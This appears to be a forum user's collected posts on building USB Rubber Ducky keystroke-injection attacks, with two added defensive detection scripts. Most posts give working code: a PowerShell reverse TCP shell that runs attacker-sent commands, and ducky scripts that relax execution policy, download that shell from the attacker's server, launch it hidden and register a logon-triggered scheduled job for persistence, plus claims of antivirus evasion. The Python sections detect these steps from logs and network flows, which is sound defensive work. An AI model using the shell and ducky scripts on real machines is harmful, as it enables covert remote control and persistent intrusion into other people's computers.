Posts: 17
Posts posted by basic4
-
Using a Scheduled Job to make the Reverse Powershell Survive Reboot
I've added a couple of lines to the powershell ducky script that schedules the reverse shell script to re-start after boot-up and logon by the user. This now gives us connection resilience and some degree of permanence, allowing the shell to reconnect to the server around 50 secs after a logon by our hijacked user.
REM Opens a reverse shell to back to netcat on 192.168.0.29:6673
REM Downloads payload from a webserver on 192.168.0.29:80 (see PS_TCP4.ps1 script)
REM MAP UK - for WifiDucky only.
DELAY 2000
GUI
DELAY 2500
STRING powershell.exe
DELAY 800
MENU
DELAY 500
STRING a
ENTER
DELAY 1200
ALT + Y
DELAY 250
ENTER
DELAY 3000
REM first lets set the execution policy if possible
STRING Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
DELAY 50
ENTER
DELAY 750
STRING Y
DELAY 250
ENTER
DELAY 200
STRING $dirx = "C:\Users\" + [Environment]::UserName + "\Documents";
DELAY 70
ENTER
DELAY 50
STRING $fullpath = $dirx + "\PS_TCP4.ps1";
DELAY 70
ENTER
DELAY 50
STRING Invoke-WebRequest -Uri "http://192.168.0.29/PS_TCP4.ps1" -OutFile $fullpath;
DELAY 50
ENTER
REM delay here to ensure download is complete
DELAY 3500
REM finally - attempt to make the shell survive a reboot
STRING $jobtrigger = New-JobTrigger -AtLogon -RandomDelay 00:00:50
DELAY 50
ENTER
DELAY 400
STRING Register-ScheduledJob -Trigger $jobtrigger -Scriptblock{cd $dirx; ./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673} -Name "NetCheckRun"
DELAY 50
ENTER
DELAY 1200
STRING cd $dirx;
ENTER
DELAY 200
STRING powershell.exe -windowstyle hidden {./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673}
DELAY 100
ENTER
DELAY 200
STRING exit
ENTER
Using the command concat style outlined in illwill's script (see post above), it should be possible to 'self-write' the reverse shell script within the ducky script and circumvent the need to download the script.
-
Hi Zibri - Yes. You'd need to install the serial drivers via a script (powershell etc) to get full 2-way communication.
-
illwill - Nice that download isn't required on your script.
I think I'll make a hybrid to get a non-download one, but still retain error control and connection recovery. I've also found a way to survive target reboot. Tested it yesterday and it works on Win7. Still need to confirm it will work on Win10. I'll post it up later today.
-
WATSEE: As for the keyboard layout issue (US/UK) - I think the easiest way would be to alter the bash script to pickup a locale identifier (eg. 'MAP UK' or 'MAP US') and translate the 6-8 character differences between the two keyboard types. I had to do the same with other Arduino 'Ducky' projects I worked on. If I get time in the next few days, I'll do that and post it back here.
Edit: Looks like you'd maybe be better trying something like 'setxkbmap gb', as you'd need to change both the duckpi.sh and the C file. (I wonder why the originators wrote it that way - seems a bit limited.)
-
Better to parameterise the destination address and port of the attacker machine in the powershell script. Makes things easier to change dynamically - if required.
Example: ./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673
param([String]$dest,
      [Int32]$port
);
while (1 -eq 1)
{
    $ErrorActionPreference = 'Continue';
    try
    {
        #attempt initial connection
        $client = New-Object System.Net.Sockets.TCPClient($dest,$port);
        $stream = $client.GetStream();
        [byte[]]$bytes = 0..255|%{0};
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Client Connected..."+"`n`n" + "PS " + (pwd).Path + "> ");
        $stream.Write($sendbytes,0,$sendbytes.Length);$stream.Flush();
        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $recdata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
            if($recdata.StartsWith("kill-link")){ cls; $client.Close(); exit;}
            try
            {
                #attempt to execute the received command
                $sendback = (iex $recdata 2>&1 | Out-String );
                $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
            }
            catch
            {
                $error[0].ToString() + $error[0].InvocationInfo.PositionMessage;
                $sendback2 = "ERROR: " + $error[0].ToString() + "`n`n" + "PS " + (pwd).Path + "> ";
                cls;
            }
            $returnbytes = ([text.encoding]::ASCII).GetBytes($sendback2);
            $stream.Write($returnbytes,0,$returnbytes.Length);$stream.Flush();
        }
    }
    catch
    {
        #an initial connection error - close and wait 30 secs then retry
        if($client.Connected)
        {
            $client.Close();
        }
        cls;
        Start-Sleep -s 30;
    }
}
Obviously we'd also have to change the appropriate call in the powershell ducky script...
STRING powershell.exe -windowstyle hidden {./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673}
Also, on some Win10 machines, executing powershell scripts is disabled by default. But I seem to be able to get around that with a few extra lines in the ducky script which set the execution policy for the current user. So our new ducky script would be:
REM Opens a reverse shell to back to netcat on 192.168.0.29:6673
REM Downloads payload from a webserver on 192.168.0.29:80 (see PS_TCP4.ps1 script)
DELAY 2000
GUI
DELAY 2000
STRING powershell.exe
ENTER
DELAY 3000
REM first lets set the execution policy if possible
STRING Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
DELAY 50
ENTER
DELAY 750
STRING Y
DELAY 250
ENTER
DELAY 200
STRING $dirx = "C:\Users\" + [Environment]::UserName + "\Documents";
DELAY 70
ENTER
DELAY 50
STRING $fullpath = $dirx + "\PS_TCP4.ps1";
DELAY 70
ENTER
DELAY 50
STRING Invoke-WebRequest -Uri "http://192.168.0.29/PS_TCP4.ps1" -OutFile $fullpath;
DELAY 50
ENTER
REM delay here to ensure download is complete
DELAY 3500
STRING cd $dirx;
ENTER
DELAY 100
STRING powershell.exe -windowstyle hidden {./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673}
DELAY 100
ENTER
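From the defender's side, the two ducky scripts above leave a very recognisable trail in PowerShell script block logging (Event ID 4104): each typed command becomes its own event, so the execution-policy change, the download of a .ps1 over plain HTTP, the logon-triggered job registration and the hidden-window launch all land on the same host and user within a few seconds. The following is an added example of a triage script, not code from the original posts or from any of the author's projects. It assumes script block logging is enabled and that a collector has already flattened events into (timestamp, host, user, ScriptBlockText) tuples; the sample events, host names and users are constructed for the example, and the indicator names are this example's own.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed PowerShell script block log entries (Event ID 4104) in the shape a
# hypothetical collector hands them over: (timestamp, host, user, ScriptBlockText).
# The WS01 entries mirror the commands the ducky scripts type, one event each.
SAMPLE_EVENTS = [
    ("2017-03-01T09:15:02", "WS01", "alice", r"Get-ChildItem C:\Logs | Where-Object Length -gt 1MB"),
    ("2017-03-01T09:15:10", "WS01", "alice", "Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"),
    ("2017-03-01T09:15:11", "WS01", "alice", r'$dirx = "C:\Users\" + [Environment]::UserName + "\Documents";'),
    ("2017-03-01T09:15:12", "WS01", "alice", 'Invoke-WebRequest -Uri "http://192.168.0.29/PS_TCP4.ps1" -OutFile $fullpath;'),
    ("2017-03-01T09:15:16", "WS01", "alice", "$jobtrigger = New-JobTrigger -AtLogon -RandomDelay 00:00:50"),
    ("2017-03-01T09:15:17", "WS01", "alice", 'Register-ScheduledJob -Trigger $jobtrigger -Scriptblock{cd $dirx; ./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673} -Name "NetCheckRun"'),
    ("2017-03-01T09:15:19", "WS01", "alice", "powershell.exe -windowstyle hidden {./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673}"),
    # a lone execution-policy change elsewhere: worth a look, not an alert on its own
    ("2017-03-01T11:40:00", "WS02", "bob", "Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"),
]

# Indicator patterns (names are this example's own). Each one is weak alone;
# the correlation below only alerts when several co-occur in one session.
INDICATORS = {
    # execution policy relaxed for the current user only (needs no admin rights)
    "execpolicy_relaxed": re.compile(r"Set-ExecutionPolicy\s+(?:RemoteSigned|Unrestricted|Bypass)\b.*-Scope\s+CurrentUser", re.I),
    # a .ps1 fetched over HTTP(S) and written straight to disk
    "download_ps1": re.compile(r"Invoke-WebRequest\b.*https?://\S+?\.ps1\b.*-OutFile", re.I | re.S),
    # a trigger that fires at every logon (scheduled job or scheduled task flavour)
    "logon_trigger": re.compile(r"(?:New-JobTrigger|New-ScheduledTaskTrigger)\b.*-AtLogon\b", re.I),
    "scheduled_job": re.compile(r"Register-Scheduled(?:Job|Task)\b", re.I),
    # a child PowerShell started without a visible window
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    # raw TCP client plus Invoke-Expression in the same script block (the shell body itself)
    "tcp_client_eval": re.compile(r"Net\.Sockets\.TcpClient\b.*\b(?:iex|Invoke-Expression)\b", re.I | re.S),
}


def indicators_for(text):
    """Return the set of indicator names whose pattern matches one script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def correlate(events, window=timedelta(seconds=120), threshold=3):
    """Group events per (host, user); raise one alert per session in which at least
    `threshold` distinct indicators occur within `window` of each other."""
    sessions = defaultdict(list)
    for ts, host, user, text in events:
        sessions[(host, user)].append((datetime.fromisoformat(ts), text))
    alerts = []
    for (host, user), items in sessions.items():
        items.sort(key=lambda item: item[0])
        recent = deque()   # (time, indicators) of flagged events still inside the window
        alert = None
        for when, text in items:
            found = indicators_for(text)
            if not found:
                continue
            recent.append((when, found))
            while when - recent[0][0] > window:
                recent.popleft()
            union = set().union(*(f for _, f in recent))
            if len(union) < threshold:
                continue
            if alert is None:
                alert = {"host": host, "user": user,
                         "first_seen": recent[0][0].isoformat(),
                         "last_seen": when.isoformat(), "indicators": set()}
                alerts.append(alert)
            alert["indicators"] |= union      # keep widening as the session goes on
            alert["last_seen"] = when.isoformat()
    for alert in alerts:
        alert["indicators"] = sorted(alert["indicators"])
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Run as-is it reports one alert for WS01/alice carrying all five typed-command indicators and stays quiet for the single policy change on WS02; the `tcp_client_eval` pattern is what fires on the body of PS_TCP4.ps1 itself once it is logged as a script block. The window and threshold are the knobs to tune against your own baseline of admin activity; a shorter window is appropriate here because a ducky types its whole sequence in seconds.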
-
Hi - Are you in the UK? - If so, you need to change the key mapping when encoding your script. See international keyboards in the ducky docs.
Regards,
basic4.
-
I've used the powershell script above (PS_TCP4.ps1) in a ducky script and it works perfectly on Win7 & 10!
Setup
Set up my 'evil server' on a Raspberry Pi3 (webserver on port 80 and netcat listening on port 6673)
The ducky script then runs on a windows 7/10 target:
1. Opens powershell on the target.
2. Downloads the reverse shell payload script.
3. Executes it, thus forming a link back to netcat running on the Raspberry Pi3.
Ducky script:
REM Opens a reverse shell to back to netcat on 192.168.0.17:6673
REM Downloads payload from a webserver on 192.168.0.17:80 (see PS_TCP4.ps1 script)
DELAY 2000
GUI
DELAY 800
STRING powershell.exe
ENTER
DELAY 2000
STRING $dirx = "C:\Users\" + [Environment]::UserName + "\Documents";
DELAY 70
ENTER
DELAY 50
STRING $fullpath = $dirx + "\PS_TCP4.ps1";
DELAY 70
ENTER
DELAY 50
STRING Invoke-WebRequest -Uri "http://192.168.0.17/PS_TCP4.ps1" -OutFile $fullpath;
DELAY 50
ENTER
REM delay here to ensure download is complete
DELAY 3500
STRING cd $dirx;
ENTER
DELAY 100
STRING powershell.exe -windowstyle hidden {./PS_TCP4.ps1}
DELAY 100
ENTER
Conclusions
This seems to work very well and doesn't get Kaspersky's attention at all. I'm sure that the ducky script could be improved greatly. But I'm happy the proof-of-concept is sound.
-
Hi - A ducky only works if the user IS logged in AND the screen isn't locked.
Using a ducky requires that the user has walked away from the target machine without locking it. Or if you can distract the user from the screen for the amount of time needed to insert the ducky and run its script.
When a machine is locked, can you use the keyboard (except to log in)? No - you need the password, which we don't know.
So a Ducky is just a tool to type commands very quickly - that's all.
Regards,
Basic4.
-
Reverse TCP Shell using Powershell Only
Hi Guys.
I was having problems getting a payload for the ducky that wasn't detected by Kaspersky, AVG etc. So I started to look into the possibility of using Powershell only to create a reverse TCP shell. I found some promising base code on a Powershell site and made some additions/adaptations for connection resilience and error handling. Now, the nice thing about this PS script is that it's compatible with a netcat listener! Should be very easy to utilize this via a ducky script on my 'WiDucky'. (Wifi enabled ducky - https://github.com/basic4/WiDucky)
Just set up a netcat listener on the attacker machine with: nc -l 6673
I've added code for the script to automatically reconnect to the attacker if connection is lost, and the script also returns shell error text to the listener too.
The Powershell Script itself (could still use some tidying up - but works perfectly as is :)
while (1 -eq 1)
{
    $ErrorActionPreference = 'Continue';
    try
    {
        #attempt initial connection
        $client = New-Object System.Net.Sockets.TCPClient("192.168.0.17",6673);
        $stream = $client.GetStream();
        [byte[]]$bytes = 0..255|%{0};
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Client Connected..."+"`n`n" + "PS " + (pwd).Path + "> ");
        $stream.Write($sendbytes,0,$sendbytes.Length);$stream.Flush();
        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $recdata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
            if($recdata.StartsWith("kill-link")){ cls; $client.Close(); exit;}
            try
            {
                #attempt to execute the received command
                $sendback = (iex $recdata 2>&1 | Out-String );
                $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
            }
            catch
            {
                $error[0].ToString() + $error[0].InvocationInfo.PositionMessage;
                $sendback2 = "ERROR: " + $error[0].ToString() + "`n`n" + "PS " + (pwd).Path + "> ";
                cls;
            }
            $returnbytes = ([text.encoding]::ASCII).GetBytes($sendback2);
            $stream.Write($returnbytes,0,$returnbytes.Length);$stream.Flush();
        }
    }
    catch
    {
        #an initial connection error - close and wait 30 secs then retry
        if($client.Connected)
        {
            $client.Close();
        }
        cls;
        Start-Sleep -s 30;
    }
}
This is my first powershell script. But given how easy it was to get this working, I'm certainly going to use it more.
Regards,
Basic4.
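Two properties of the script in this post are useful on the network side, which is where it is most visible because everything it sends is plaintext: on every successful connect it writes a fixed banner ("Client Connected..." followed by a "PS <cwd>> " prompt) as the first client-to-server bytes, and when no listener answers it retries the same address and port every 30 seconds (Start-Sleep -s 30 in the catch block). The following is an added example of a detector for both, not code from the original post or from the author's projects. It assumes flow records already reduced to (timestamp, src, dst, dport) tuples, a format constructed for this example; the source and browsing addresses are constructed, and the 30 s period only holds while the connection is refused promptly, so if SYNs are silently dropped the gap stretches by the connect timeout and `period_s` should be raised accordingly.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# The script's connect banner: "Client Connected..." + "`n`n" + "PS " + <cwd> + "> ".
# A prefix match on the first server-bound payload of a new flow is enough.
BANNER_RX = re.compile(rb"\AClient Connected\.\.\.\n\nPS [^\n]*> ")


def banner_matches(first_payload: bytes) -> bool:
    """True if the first bytes a client sends look like the script's connect banner."""
    return BANNER_RX.search(first_payload) is not None


# Constructed connection records from a hypothetical flow collector: (timestamp, src,
# dst, dport). 10.0.0.15 retries 192.168.0.17:6673 roughly every 30 s while no listener
# answers; the 443 flows to 203.0.113.10 (documentation range) stand in for browsing.
SAMPLE_FLOWS = [
    ("2017-03-01T09:16:00", "10.0.0.15", "192.168.0.17", 6673),
    ("2017-03-01T09:16:05", "10.0.0.15", "203.0.113.10", 443),
    ("2017-03-01T09:16:30", "10.0.0.15", "192.168.0.17", 6673),
    ("2017-03-01T09:16:41", "10.0.0.15", "203.0.113.10", 443),
    ("2017-03-01T09:17:01", "10.0.0.15", "192.168.0.17", 6673),
    ("2017-03-01T09:17:03", "10.0.0.15", "203.0.113.10", 443),
    ("2017-03-01T09:17:30", "10.0.0.15", "192.168.0.17", 6673),
    ("2017-03-01T09:18:01", "10.0.0.15", "192.168.0.17", 6673),
    ("2017-03-01T09:19:12", "10.0.0.15", "203.0.113.10", 443),
]


def find_beacons(flows, period_s=30.0, tolerance_s=3.0, min_attempts=4):
    """Flag (src, dst, dport) triples whose connection attempts recur at a fixed
    interval: median gap within tolerance of `period_s` and low jitter."""
    by_key = defaultdict(list)
    for ts, src, dst, dport in flows:
        by_key[(src, dst, dport)].append(datetime.fromisoformat(ts))
    beacons = []
    for (src, dst, dport), times in by_key.items():
        if len(times) < min_attempts:
            continue            # too few attempts to say anything about cadence
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mid = median(gaps)
        jitter = max(abs(g - mid) for g in gaps)
        if abs(mid - period_s) <= tolerance_s and jitter <= tolerance_s:
            beacons.append({"src": src, "dst": dst, "dport": dport,
                            "attempts": len(times), "period_s": mid, "jitter_s": jitter})
    return beacons


if __name__ == "__main__":
    print(banner_matches(b"Client Connected...\n\nPS C:\\Users\\alice\\Documents> "))
    for beacon in find_beacons(SAMPLE_FLOWS):
        print(beacon)
```

On the sample data the 6673 flows come out with a median gap of 30.5 s and 1.5 s of jitter and are reported; the 443 flows have irregular gaps and are not. Note that the cadence only shows while the listener is down: once a session is up the script holds a single long-lived connection, which is when the banner signature and the plaintext "PS ...> " prompts in the stream are the things to look for.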
-
See the following projects I've built around the Ducky HID attack..
https://github.com/basic4/WiDucky - Wifi Ducky with windows/Python/Android controllers.
https://github.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle - A basic ducky with microSD for under $10.
Basic4.
-
Hi
1. No ducky will work when a machine is locked. That's one of their limitations.
2. Yes - the WiDucky can just sit there and do nothing until you connect to it over WiFi - and send keystrokes.
Basic4.
-
It's all here https://github.com/basic4/WiDuck
-
It's a good solution. Although I built a wifi ducky based on arduino boards and the ESP8266, since combining both gave the possibility of full speed USB and multiple end points. I built prototypes and used these until I found the 'Cactus Micro', which is a combination of a Leonardo and ESP8266. Wrote various controllers for Python, .NET and Android. Works well. Since the Atmel chip is recognized as both a HID device and a Serial port, you can (via a script) run command prompt in a windows target, and return the output of the script (via serial) to the duck and then on back to the attacker machine! Can supply the code if you're interested.
-
Did this around a year back. Works just like a ducky only via wifi. I wrote a control app and script parser in C#, one in android (very useful) and another in Python. Since the 'controller' sends the keystrokes, interactive scripts are possible. Built 3 prototypes (differing hardware) but the smallest is the best.
The Bash Bunny is coming (in Bash Bunny)
Wifi Rubber Ducky with file download capability maybe?